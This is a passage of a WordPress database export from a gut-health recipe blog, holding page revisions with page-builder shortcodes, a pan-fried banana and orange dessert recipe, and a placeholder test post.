custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDEx\"][vc_empty_space][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1588157289763-4833a7b8-ea6e-5\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-autosave-v1','','','2020-04-29 10:51:09','2020-04-29 10:51:09','',1117,'http://tummyrevolution.com/1117-autosave-v1/',0,'revision','',0),(5397,1,'2020-04-28 00:19:47','2020-04-28 00:19:47','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5382,5379,5380,5378\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587963572981-519c597c-297a-6\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-28 00:19:47','2020-04-28 00:19:47','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5398,1,'2020-04-28 00:21:33','2020-04-28 00:21:33','[vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1588033221071-17fbefb2-1931-6\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-28 00:21:33','2020-04-28 00:21:33','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5399,1,'2020-04-28 00:23:08','2020-04-28 00:23:08','[vc_row][vc_column][vc_single_image image=\"5378\" title=\"Image\"][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1588033310521-47cfa0a6-3c83-1\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-28 00:23:08','2020-04-28 00:23:08','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5400,1,'2020-04-28 00:23:59','2020-04-28 00:23:59','[vc_row][vc_column][vc_single_image image=\"5378\" img_size=\"large\" title=\"Image\"][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1588033397436-6371211f-0a03-7\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-28 00:23:59','2020-04-28 00:23:59','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5401,1,'2020-04-28 00:27:04','2020-04-28 00:27:04','[vc_row][vc_column][vc_gallery interval=\"3\" images=\"5379,5378,5382\" img_size=\"large\"][vc_empty_space][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1588033452556-8f75e41d-3d86-9\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-28 00:27:04','2020-04-28 00:27:04','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5402,1,'2020-04-28 00:28:51','2020-04-28 00:28:51','[vc_row][vc_column][vc_gallery interval=\"3\" images=\"5379,5378,5382\" img_size=\"large\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDEx\" title=\"Get Book Now\"][vc_empty_space][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1588033654961-159e4502-d5a9-7\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-28 00:28:51','2020-04-28 00:28:51','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5403,1,'2020-04-28 00:29:59','2020-04-28 00:29:59','[vc_row][vc_column][vc_gallery interval=\"3\" images=\"5379,5378,5382\" img_size=\"large\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDEx\"][vc_empty_space][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1588033760795-b2df4af7-7aae-0\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-28 00:29:59','2020-04-28 00:29:59','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5405,1,'2020-04-29 04:38:12','2020-04-29 04:38:12','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\n\n**You can use tapioca or cornstarch instead.\n\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','ORANGE TEA','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','2142-autosave-v1','','','2020-04-29 04:38:12','2020-04-29 04:38:12','',2142,'http://tummyrevolution.com/2142-autosave-v1/',0,'revision','',0),(5430,1,'2020-10-27 14:47:18','2020-10-27 14:47:18','\n

I\'m a huge fan of fruit and happily eat most fruits as they come. Sometimes it\'s nice to do something a bit more special with fruit though and this recipe is definitely special. Panfried bananas and oranges lightly coated with cinnamon and maple syrup mmmm..., then top it off with some whipped coconut or vanilla cream - amazing!

If you have a troubling tummy like me some fruits are better to eat than others. Bananas and oranges and both on the good list - yesss! so this recipe works well for troubling tumms. What I like with this recipe is the combination of the cinnamon flavoured banana mixed with the citrus flavour of the orange and then topped off with some coconutty cream (or vanilla if you choose that option). It is just such nice mix of flavours and I love the way it looks on the plate too - perfect for a dinner party.

You do want to eat this dessert warm though as it is not half as good cold - believe me, I\'ve tried it.
Luckily it\'s very easy to make so it will not take you long to get it ready.

If you\'ve not made whipped coconut cream, don\'t worry, It\'s very easy to make and if you make some extra you can store it in your fridge and have with other fruits and berries.

\n\n\n\n
\"\"
\n\n\n\n

INGREDIENTS

2 oranges

\n\n\n\n

2 ripe, but firm bananas, sliced

\n\n\n\n

1 tbsp butter or coconut oil

\n\n\n\n

1 tsp pure maple syrum

\n\n\n\n

1/8 tsp cinnamon

\n\n\n\n

1/8 tsp vanilla extract

\n\n\n\n

pinch of sea salt

\n\n\n\n

Coconut Cream:

\n\n\n\n

1 can full fat coconut milk or cream

\n\n\n\n

1 tsp grated orange zest (optional)

\n\n\n\n

Toppings:

\n\n\n\n

Unsweetened coconut flakes

\n\n\n\n

Chopped Macadamia nuts

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Over medium heat, melt the butter and maple syrup in a frying pan. Add cinnamon, salt and vanilla extract, and stir to combine.

\n\n\n\n

Place the sliced in half bananas in the pan and cook on medium heat for 2-4 minutes each side. Be sure to watch bananas as they caramelize to ensure they don’t brown.

\n\n\n\n

Remove the bananas from the pan and add the sliced in half oranges. Cook for 2-3 minutes over medium heat.

\n\n\n\n

Take the pan off the heat and remove the oranges.

\n\n\n\n

While bananas and oranges are cooling, open your coconut cream. Gently pour out the coconut water that is separated and sitting on top of the coconut cream into a separate bowl.

\n\n\n\n

Place the thick cream that remains in a mixing bowl and whip until peaks form (about 2-3 minutes on high if using a mixer), then stir in some orange zest.

You can also use normal whipping cream. I then add some vanilla extract and orange zest.

\n\n\n\n

Place out your oranges on plates and lace one banana slice on each orange. Top them off with coconut cream, chopped macadamia nuts, and coconut flakes.

\n\n\n\n
\"\"
\n','Pan-fried bananas & oranges with coconut cream','','inherit','closed','closed','','5054-revision-v1','','','2020-10-27 14:47:18','2020-10-27 14:47:18','',5054,'https://tummyrevolution.com/5054-revision-v1/',0,'revision','',0),(5425,1,'2020-09-09 22:01:12','2020-09-09 22:01:12','http://tummyrevolution.com/wp-content/uploads/2018/01/cropped-Logo-1000-x-.png','cropped-Logo-1000-x-.png','','inherit','open','closed','','cropped-logo-1000-x-png','','','2020-09-09 22:01:12','2020-09-09 22:01:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/cropped-Logo-1000-x-.png',0,'attachment','image/png',0),(5428,1,'2020-10-27 14:37:57','2020-10-27 14:37:57','\n

I\'m a huge fan of fruit and happily eat most fruits as they come. Sometimes it\'s nice to do something a bit more special with fruit though and this recipe is definitely special. Panfried bananas and oranges lightly coated with cinnamon and maple syrup mmmm..., then top it off with some whipped coconut or vanilla cream - amazing!

If you have a troubling tummy like me some fruits are better to eat than others. Bananas and oranges and both on the good list - yesss! so this recipe works well for troubling tumms. What I like with this recipe is the combination of the cinnamon flavoured banana mixed with the citrus flavour of the orange and then topped off with some coconutty cream (or vanilla if you choose that option). It is just such nice mix of flavours and I love the way it looks on the plate too - perfect for a dinner party.

You do want to eat this dessert warm though as it is not half as good cold - believe me, I\'ve tried it.
Luckily it\'s very easy to make so it will not take you long to get it ready.

If you\'ve not made whipped coconut cream, don\'t worry, It\'s very easy to make and if you make some extra you can store it in your fridge and have with other fruits and berries.

\n\n\n\n
\"\"
\n\n\n\n

INGREDIENTS

2 oranges

\n\n\n\n

2 ripe, but firm bananas, sliced

\n\n\n\n

1 tbsp butter or coconut oil

\n\n\n\n

1 tsp pure maple syrum

\n\n\n\n

1/8 tsp cinnamon

\n\n\n\n

1/8 tsp vanilla extract

\n\n\n\n

pinch of sea salt

\n\n\n\n

Coconut Cream:

\n\n\n\n

1 can full fat coconut milk or cream

\n\n\n\n

1 tsp grated orange zest (optional)

\n\n\n\n

Toppings:

\n\n\n\n

Unsweetened coconut flakes

\n\n\n\n

Chopped Macadamia nuts

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Over medium heat, melt the butter and maple syrup in a frying pan. Add cinnamon, salt and vanilla extract, and stir to combine.

\n\n\n\n

Place the sliced in half bananas in the pan and cook on medium heat for 2-4 minutes each side. Be sure to watch bananas as they caramelize to ensure they don’t brown.

\n\n\n\n

Remove the bananas from the pan and add the sliced in half oranges. Cook for 2-3 minutes over medium heat.

\n\n\n\n

Take the pan off the heat and remove the oranges.

\n\n\n\n

While bananas and oranges are cooling, open your coconut cream. Gently pour out the coconut water that is separated and sitting on top of the coconut cream into a separate bowl.

\n\n\n\n

Place the thick cream that remains in a mixing bowl and whip until peaks form (about 2-3 minutes on high if using a mixer), then stir in some orange zest.

You can also use normal whipping cream. I then add some vanilla extract and orange zest.

\n\n\n\n

Place out your oranges on plates and lace one banana slice on each orange. Top them off with coconut cream, chopped macadamia nuts, and coconut flakes.

\n\n\n\n
\"\"
\n','Pan-fried bananas & oranges with coconut cream','','inherit','closed','closed','','5054-revision-v1','','','2020-10-27 14:37:57','2020-10-27 14:37:57','',5054,'https://tummyrevolution.com/5054-revision-v1/',0,'revision','',0),(5410,1,'2020-04-29 05:45:07','2020-04-29 05:45:07','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]this is first paragraph[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n\r\nPer in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum\r\n\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]third paragraph,, you can edit it[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"5393,5392\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%7B%7D%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Test Post','','publish','open','open','','test-post','','','2020-04-29 06:00:01','2020-04-29 06:00:01','',0,'http://tummyrevolution.com/?p=5410',0,'post','',0),(5411,1,'2020-04-29 05:45:07','2020-04-29 05:45:07','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]this is first paragraph[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n\r\nPer in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum\r\n\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]third paragraph,, you can edit it[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"5393,5392\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%7B%7D%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Test Post','','inherit','closed','closed','','5410-revision-v1','','','2020-04-29 